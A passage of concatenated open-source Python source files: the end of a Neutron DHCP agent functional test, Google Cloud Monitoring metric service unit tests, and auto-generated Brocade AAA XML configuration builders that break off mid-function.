mac_address=str(self._TENANT_PORT_MAC_ADDRESS),
ip_address=str(ip_addr))
return network, port
def assert_good_allocation_for_port(self, network, port):
vif_name = self.get_interface_name(network.id, port)
self._run_dhclient(vif_name, network)
predicate = lambda: len(
self._ip_list_for_vif(vif_name, network.namespace))
common_utils.wait_until_true(predicate, 10)
ip_list = self._ip_list_for_vif(vif_name, network.namespace)
cidr = ip_list[0].get('cidr')
ip_addr = str(netaddr.IPNetwork(cidr).ip)
self.assertEqual(port.fixed_ips[0].ip_address, ip_addr)
def assert_bad_allocation_for_port(self, network, port):
vif_name = self.get_interface_name(network.id, port)
self._run_dhclient(vif_name, network)
# we need wait some time (10 seconds is enough) and check
# that dhclient not configured ip-address for interface
eventlet.sleep(10)
ip_list = self._ip_list_for_vif(vif_name, network.namespace)
self.assertEqual([], ip_list)
def _run_dhclient(self, vif_name, network):
# NOTE: Before run dhclient we should create resolv.conf file
# in namespace, where we will run dhclient for testing address
# allocation for port, otherwise, dhclient will override
# system /etc/resolv.conf
# By default, folder for dhcp-agent's namespace doesn't exist
# that's why we use AdminDirFixture for create directory
# with admin permissions in /etc/netns/ and touch resolv.conf in it.
etc_dir = '/etc/netns/%s' % network.namespace
self.useFixture(helpers.AdminDirFixture(etc_dir))
cmd = ['touch', os.path.join(etc_dir, 'resolv.conf')]
utils.execute(cmd, run_as_root=True)
dhclient_cmd = ['dhclient', '--no-pid', '-d', '-1', vif_name]
proc = net_helpers.RootHelperProcess(
cmd=dhclient_cmd, namespace=network.namespace)
self.addCleanup(proc.wait)
self.addCleanup(proc.kill)
def _get_metadata_proxy_process(self, network):
return external_process.ProcessManager(
self.conf,
network.id,
network.namespace)
class DHCPAgentOVSTestCase(DHCPAgentOVSTestFramework):
def test_create_subnet_with_dhcp(self):
dhcp_enabled = True
for version in [4, 6]:
network = self.network_dict_for_dhcp(
dhcp_enabled, ip_version=version)
self.configure_dhcp_for_network(network=network,
dhcp_enabled=dhcp_enabled)
self.assert_dhcp_resources(network, dhcp_enabled)
def test_create_subnet_with_non64_ipv6_cidrs(self):
# the agent should not throw exceptions on weird prefixes
dhcp_enabled = True
version = 6
for i in (0, 1, 41, 81, 121, 127, 128):
network = self.network_dict_for_dhcp(
dhcp_enabled, ip_version=version, prefix_override=i)
self.configure_dhcp_for_network(network=network,
dhcp_enabled=dhcp_enabled)
self.assertFalse(self.agent.needs_resync_reasons[network.id],
msg="prefix size of %s triggered resync" % i)
def test_agent_mtu_set_on_interface_driver(self):
network = self.network_dict_for_dhcp()
network["mtu"] = 789
self.configure_dhcp_for_network(network=network)
port = network.ports[0]
iface_name = self.get_interface_name(network, port)
dev = ip_lib.IPDevice(iface_name, network.namespace)
self.assertEqual(789, dev.link.mtu)
def test_good_address_allocation(self):
network, port = self._get_network_port_for_allocation_test()
network.ports.append(port)
self.configure_dhcp_for_network(network=network)
self._plug_port_for_dhcp_request(network, port)
self.assert_good_allocation_for_port(network, port)
def test_bad_address_allocation(self):
network, port = self._get_network_port_for_allocation_test()
network.ports.append(port)
self.configure_dhcp_for_network(network=network)
bad_mac_address = netaddr.EUI(self._TENANT_PORT_MAC_ADDRESS.value + 1)
bad_mac_address.dialect = netaddr.mac_unix
port.mac_address = str(bad_mac_address)
self._plug_port_for_dhcp_request(network, port)
self.assert_bad_allocation_for_port(network, port)
def _spawn_network_metadata_proxy(self):
network = self.network_dict_for_dhcp()
self.conf.set_override('enable_isolated_metadata', True)
self.addCleanup(self.agent.disable_isolated_metadata_proxy, network)
self.configure_dhcp_for_network(network=network)
pm = self._get_metadata_proxy_process(network)
common_utils.wait_until_true(
lambda: pm.active,
timeout=5,
sleep=0.01,
exception=RuntimeError("Metadata proxy didn't spawn"))
return (pm, network)
def test_metadata_proxy_respawned(self):
pm, network = self._spawn_network_metadata_proxy()
old_pid = pm.pid
utils.execute(['kill', '-9', old_pid], run_as_root=True)
common_utils.wait_until_true(
lambda: pm.active and pm.pid != old_pid,
timeout=5,
sleep=0.1,
exception=RuntimeError("Metadata proxy didn't respawn"))
def test_stale_metadata_proxy_killed(self):
pm, network = self._spawn_network_metadata_proxy()
self.conf.set_override('enable_isolated_metadata', False)
self.configure_dhcp_for_network(network=network)
common_utils.wait_until_true(
lambda: not pm.active,
timeout=5,
sleep=0.1,
exception=RuntimeError("Stale metadata proxy didn't get killed"))
def _test_metadata_proxy_spawn_kill_with_subnet_create_delete(self):
network = self.network_dict_for_dhcp(ip_version=6)
self.configure_dhcp_for_network(network=network)
pm = self._get_metadata_proxy_process(network)
# A newly created network with ipv6 subnet will not have metadata proxy
self.assertFalse(pm.active)
new_network = copy.deepcopy(network)
dhcp_enabled_ipv4_subnet = self.create_subnet_dict(network.id)
new_network.subnets.append(dhcp_enabled_ipv4_subnet)
self.mock_plugin_api.get_network_info.return_value = new_network
self.agent.refresh_dhcp_helper(network.id)
# Metadata proxy should be spawned for the newly added subnet
common_utils.wait_until_true(
lambda: pm.active,
timeout=5,
sleep=0.1,
exception=RuntimeError("Metadata proxy didn't spawn"))
self.mock_plugin_api.get_network_info.return_value = network
self.agent.refresh_dhcp_helper(network.id)
# Metadata proxy should be killed because network doesn't need it.
common_utils.wait_until_true(
lambda: not pm.active,
timeout=5,
sleep=0.1,
exception=RuntimeError("Metadata proxy didn't get killed"))
def test_enable_isolated_metadata_for_subnet_create_delete(self):
self.conf.set_override('force_metadata', False)
self.conf.set_override('enable_isolated_metadata', True)
self._test_metadata_proxy_spawn_kill_with_subnet_create_delete()
def test_force_metadata_for_subnet_create_delete(self):
self.conf.set_override('force_metadata', True)
self.conf.set_override('enable_isolated_metadata', False)
self._test_metadata_proxy_spawn_kill_with_subnet_create_delete()
def test_notify_port_ready_after_enable_dhcp(self):
network = self.network_dict_for_dhcp()
dhcp_port = self.create_port_dict(
network.id, network.subnets[0].id,
'24:77:03:7d:00:4d', ip_address='192.168.10.11')
dhcp_port.device_owner = lib_const.DEVICE_OWNER_DHCP
network.ports.append(dhcp_port)
self.agent.start_ready_ports_loop()
self.configure_dhcp_for_network(network)
ports_to_send = {p.id for p in network.ports}
common_utils.wait_until_true(
lambda: self.mock_plugin_api.dhcp_ready_on_ports.called,
timeout=1,
sleep=0.1,
exception=RuntimeError("'dhcp_ready_on_ports' not be called"))
self.mock_plugin_api.dhcp_ready_on_ports.assert_called_with(
ports_to_send)
| huntxu/neutron | neutron/tests/functional/agent/test_dhcp_agent.py | Python | apache-2.0 | 17,256 |
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import mock
import pytest
from google.api import metric_pb2 as api_metric_pb2
from google.api import monitored_resource_pb2
from google.cloud import monitoring_v3
from google.cloud.monitoring_v3 import enums
from google.cloud.monitoring_v3.proto import common_pb2
from google.cloud.monitoring_v3.proto import metric_pb2 as proto_metric_pb2
from google.cloud.monitoring_v3.proto import metric_service_pb2
from google.protobuf import empty_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self, method, request_serializer=None, response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestMetricServiceClient(object):
def test_list_monitored_resource_descriptors(self):
# Setup Expected Response
next_page_token = ""
resource_descriptors_element = {}
resource_descriptors = [resource_descriptors_element]
expected_response = {
"next_page_token": next_page_token,
"resource_descriptors": resource_descriptors,
}
expected_response = metric_service_pb2.ListMonitoredResourceDescriptorsResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.project_path("[PROJECT]")
paged_list_response = client.list_monitored_resource_descriptors(name)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.resource_descriptors[0] == resources[0]
assert len(channel.requests) == 1
expected_request = metric_service_pb2.ListMonitoredResourceDescriptorsRequest(
name=name
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_monitored_resource_descriptors_exception(self):
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.project_path("[PROJECT]")
paged_list_response = client.list_monitored_resource_descriptors(name)
with pytest.raises(CustomException):
list(paged_list_response)
def test_get_monitored_resource_descriptor(self):
# Setup Expected Response
name_2 = "name2-1052831874"
type_ = "type3575610"
display_name = "displayName1615086568"
description = "description-1724546052"
expected_response = {
"name": name_2,
"type": type_,
"display_name": display_name,
"description": description,
}
expected_response = monitored_resource_pb2.MonitoredResourceDescriptor(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.monitored_resource_descriptor_path(
"[PROJECT]", "[MONITORED_RESOURCE_DESCRIPTOR]"
)
response = client.get_monitored_resource_descriptor(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = metric_service_pb2.GetMonitoredResourceDescriptorRequest(
name=name
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_monitored_resource_descriptor_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.monitored_resource_descriptor_path(
"[PROJECT]", "[MONITORED_RESOURCE_DESCRIPTOR]"
)
with pytest.raises(CustomException):
client.get_monitored_resource_descriptor(name)
def test_list_metric_descriptors(self):
# Setup Expected Response
next_page_token = ""
metric_descriptors_element = {}
metric_descriptors = [metric_descriptors_element]
expected_response = {
"next_page_token": next_page_token,
"metric_descriptors": metric_descriptors,
}
expected_response = metric_service_pb2.ListMetricDescriptorsResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.project_path("[PROJECT]")
paged_list_response = client.list_metric_descriptors(name)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.metric_descriptors[0] == resources[0]
assert len(channel.requests) == 1
expected_request = metric_service_pb2.ListMetricDescriptorsRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_metric_descriptors_exception(self):
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.project_path("[PROJECT]")
paged_list_response = client.list_metric_descriptors(name)
with pytest.raises(CustomException):
list(paged_list_response)
def test_get_metric_descriptor(self):
# Setup Expected Response
name_2 = "name2-1052831874"
type_ = "type3575610"
unit = "unit3594628"
description = "description-1724546052"
display_name = "displayName1615086568"
expected_response = {
"name": name_2,
"type": type_,
"unit": unit,
"description": description,
"display_name": display_name,
}
expected_response = api_metric_pb2.MetricDescriptor(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.metric_descriptor_path("[PROJECT]", "[METRIC_DESCRIPTOR]")
response = client.get_metric_descriptor(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = metric_service_pb2.GetMetricDescriptorRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_metric_descriptor_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.metric_descriptor_path("[PROJECT]", "[METRIC_DESCRIPTOR]")
with pytest.raises(CustomException):
client.get_metric_descriptor(name)
def test_create_metric_descriptor(self):
# Setup Expected Response
name_2 = "name2-1052831874"
type_ = "type3575610"
unit = "unit3594628"
description = "description-1724546052"
display_name = "displayName1615086568"
expected_response = {
"name": name_2,
"type": type_,
"unit": unit,
"description": description,
"display_name": display_name,
}
expected_response = api_metric_pb2.MetricDescriptor(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.project_path("[PROJECT]")
metric_descriptor = {}
response = client.create_metric_descriptor(name, metric_descriptor)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = metric_service_pb2.CreateMetricDescriptorRequest(
name=name, metric_descriptor=metric_descriptor
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_metric_descriptor_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.project_path("[PROJECT]")
metric_descriptor = {}
with pytest.raises(CustomException):
client.create_metric_descriptor(name, metric_descriptor)
def test_delete_metric_descriptor(self):
channel = ChannelStub()
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.metric_descriptor_path("[PROJECT]", "[METRIC_DESCRIPTOR]")
client.delete_metric_descriptor(name)
assert len(channel.requests) == 1
expected_request = metric_service_pb2.DeleteMetricDescriptorRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_metric_descriptor_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.metric_descriptor_path("[PROJECT]", "[METRIC_DESCRIPTOR]")
with pytest.raises(CustomException):
client.delete_metric_descriptor(name)
def test_list_time_series(self):
# Setup Expected Response
next_page_token = ""
time_series_element = {}
time_series = [time_series_element]
expected_response = {
"next_page_token": next_page_token,
"time_series": time_series,
}
expected_response = metric_service_pb2.ListTimeSeriesResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.project_path("[PROJECT]")
filter_ = "filter-1274492040"
interval = {}
view = enums.ListTimeSeriesRequest.TimeSeriesView.FULL
paged_list_response = client.list_time_series(name, filter_, interval, view)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.time_series[0] == resources[0]
assert len(channel.requests) == 1
expected_request = metric_service_pb2.ListTimeSeriesRequest(
name=name, filter=filter_, interval=interval, view=view
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_time_series_exception(self):
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.project_path("[PROJECT]")
filter_ = "filter-1274492040"
interval = {}
view = enums.ListTimeSeriesRequest.TimeSeriesView.FULL
paged_list_response = client.list_time_series(name, filter_, interval, view)
with pytest.raises(CustomException):
list(paged_list_response)
def test_create_time_series(self):
channel = ChannelStub()
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.project_path("[PROJECT]")
time_series = []
client.create_time_series(name, time_series)
assert len(channel.requests) == 1
expected_request = metric_service_pb2.CreateTimeSeriesRequest(
name=name, time_series=time_series
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_time_series_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.project_path("[PROJECT]")
time_series = []
with pytest.raises(CustomException):
client.create_time_series(name, time_series)
| tseaver/google-cloud-python | monitoring/tests/unit/gapic/v3/test_metric_service_client_v3.py | Python | apache-2.0 | 16,399 |
#!/usr/bin/env python
import xml.etree.ElementTree as ET
class brocade_aaa(object):
"""Auto generated class.
"""
def __init__(self, **kwargs):
self._callback = kwargs.pop('callback')
def aaa_config_aaa_authentication_login_first(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
aaa_config = ET.SubElement(config, "aaa-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
aaa = ET.SubElement(aaa_config, "aaa")
authentication = ET.SubElement(aaa, "authentication")
login = ET.SubElement(authentication, "login")
first = ET.SubElement(login, "first")
first.text = kwargs.pop('first')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def aaa_config_aaa_authentication_login_second(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
aaa_config = ET.SubElement(config, "aaa-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
aaa = ET.SubElement(aaa_config, "aaa")
authentication = ET.SubElement(aaa, "authentication")
login = ET.SubElement(authentication, "login")
second = ET.SubElement(login, "second")
second.text = kwargs.pop('second')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def aaa_config_aaa_accounting_exec_defaultacc_start_stop_server_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
aaa_config = ET.SubElement(config, "aaa-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
aaa = ET.SubElement(aaa_config, "aaa")
accounting = ET.SubElement(aaa, "accounting")
exec_el = ET.SubElement(accounting, "exec")
defaultacc = ET.SubElement(exec_el, "defaultacc")
start_stop = ET.SubElement(defaultacc, "start-stop")
server_type = ET.SubElement(start_stop, "server-type")
server_type.text = kwargs.pop('server_type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def aaa_config_aaa_accounting_commands_defaultacc_start_stop_server_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
aaa_config = ET.SubElement(config, "aaa-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
aaa = ET.SubElement(aaa_config, "aaa")
accounting = ET.SubElement(aaa, "accounting")
commands = ET.SubElement(accounting, "commands")
defaultacc = ET.SubElement(commands, "defaultacc")
start_stop = ET.SubElement(defaultacc, "start-stop")
server_type = ET.SubElement(start_stop, "server-type")
server_type.text = kwargs.pop('server_type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name = ET.SubElement(username, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_user_password(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
user_password = ET.SubElement(username, "user-password")
user_password.text = kwargs.pop('user_password')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_encryption_level(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
encryption_level = ET.SubElement(username, "encryption-level")
encryption_level.text = kwargs.pop('encryption_level')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_role(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
role = ET.SubElement(username, "role")
role.text = kwargs.pop('role')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_desc(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
desc = ET.SubElement(username, "desc")
desc.text = kwargs.pop('desc')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_enable(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
enable = ET.SubElement(username, "enable")
enable.text = kwargs.pop('enable')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_expire(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
expire = ET.SubElement(username, "expire")
expire.text = kwargs.pop('expire')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def service_password_encryption(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
service = ET.SubElement(config, "service", xmlns="urn:brocade.com:mgmt:brocade-aaa")
password_encryption = ET.SubElement(service, "password-encryption")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def role_name_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
role = ET.SubElement(config, "role", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name = ET.SubElement(role, "name")
name = ET.SubElement(name, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def role_name_desc(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
role = ET.SubElement(config, "role", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name = ET.SubElement(role, "name")
name_key = ET.SubElement(name, "name")
name_key.text = kwargs.pop('name')
desc = ET.SubElement(name, "desc")
desc.text = kwargs.pop('desc')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_hostname(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
hostname = ET.SubElement(host, "hostname")
hostname.text = kwargs.pop('hostname')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_use_vrf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf = ET.SubElement(host, "use-vrf")
use_vrf.text = kwargs.pop('use_vrf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_auth_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
auth_port = ET.SubElement(host, "auth-port")
auth_port.text = kwargs.pop('auth_port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_protocol(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
protocol = ET.SubElement(host, "protocol")
protocol.text = kwargs.pop('protocol')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_key(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
key = ET.SubElement(host, "key")
key.text = kwargs.pop('key')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_encryption_level(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
encryption_level = ET.SubElement(host, "encryption-level")
encryption_level.text = kwargs.pop('encryption_level')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_retries(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
retries = ET.SubElement(host, "retries")
retries.text = kwargs.pop('retries')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_timeout(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
timeout = ET.SubElement(host, "timeout")
timeout.text = kwargs.pop('timeout')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_hostname(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
hostname = ET.SubElement(host, "hostname")
hostname.text = kwargs.pop('hostname')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_use_vrf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf = ET.SubElement(host, "use-vrf")
use_vrf.text = kwargs.pop('use_vrf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
port = ET.SubElement(host, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_protocol(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
protocol = ET.SubElement(host, "protocol")
protocol.text = kwargs.pop('protocol')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_key(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
key = ET.SubElement(host, "key")
key.text = kwargs.pop('key')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_encryption_level(self, **kwargs):
